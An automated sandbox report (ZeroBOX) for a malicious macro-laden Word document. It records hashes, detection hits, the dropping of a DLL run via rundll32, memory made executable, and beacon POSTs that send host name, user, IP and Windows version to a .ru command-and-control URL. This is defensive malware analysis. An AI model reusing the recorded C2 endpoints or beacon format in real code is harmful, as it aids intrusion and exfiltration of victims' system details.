popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

0803_1140088877.doc

VBA_macro MSOffice File GIF Format
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Aug. 4, 2021, 10:40 a.m. Aug. 4, 2021, 10:43 a.m.
Size 539.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Mr.Administrator, Template: Normal.dotm, Last Saved By: MyPc, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Aug 3 10:28:00 2021, Last Saved Time/Date: Tue Aug 3 10:28:00 2021, Number of Pages: 1, Number of Words: 3, Number of Characters: 19, Security: 0
MD5 6376baf5eaead1abb0ec71546fd4e4b5
SHA256 96ea2ab20add8482620a7442082f9975609643962baa08dfa6f0c797cfddf6fc
CRC32 427BE511
ssdeep 12288:WV9iQsDr8NahqNrdjqLCV8L/EnqO1BKI9vIOaCuQByhC1A5PU:WVXkr8NnNrAmqL/EnJ1BsrPzhN5c
Yara
  • Microsoft_Office_File_Zero - Microsoft Office File
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49165 -> 50.16.216.118:80 2021997 ET POLICY External IP Lookup api.ipify.org Device Retrieving External IP Address Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
suspicious_features POST method with no referer header suspicious_request POST http://arviskeist.ru/8/forum.php
request GET http://api.ipify.org/
request POST http://arviskeist.ru/8/forum.php
request POST http://arviskeist.ru/8/forum.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6aaad000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a6be000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b0c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b0c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b0c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b0c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af5000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af5000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b0c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b0c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08aeb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08aeb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08aeb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08aeb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ac9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ac9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ac9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ac9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ac9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ac9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08aeb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08aeb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ac9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ac9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ac9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ac9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ac9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ac9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ac9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ac9000
process_handle: 0xffffffff
1 0 0
domain api.ipify.org
file c:\Users\test22\AppData\Roaming\microsoft\templates\~$qq.doc
file C:\Users\test22\AppData\Local\Temp\~$03_1140088877.doc
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\qq.doc.LNK
file C:\Users\test22\AppData\Local\Temp\ter.dll
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x000004a4
filepath: C:\Users\test22\AppData\Local\Temp\~$03_1140088877.doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$03_1140088877.doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000670
filepath: c:\Users\test22\AppData\Roaming\microsoft\templates\~$qq.doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\c:\users\test22\appdata\roaming\microsoft\templates\~$qq.doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\qq.doc.LNK
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1488
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef70000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 0
family: 2
1 0 0
parent_process winword.exe martian_process rundll32 c:\users\test22\appdata\roaming\microsoft\templates\ier.dll,NXYSYMIUJMD
Time & API Arguments Status Return Repeated

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=0308_spnv5&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
0 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=0308_spnv5&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
0 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=0308_spnv5&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
1 1 0
file C:\Users\test22\AppData\Local\Temp\ter.dll
dead_host 212.193.48.110:80
dead_host 45.129.237.96:80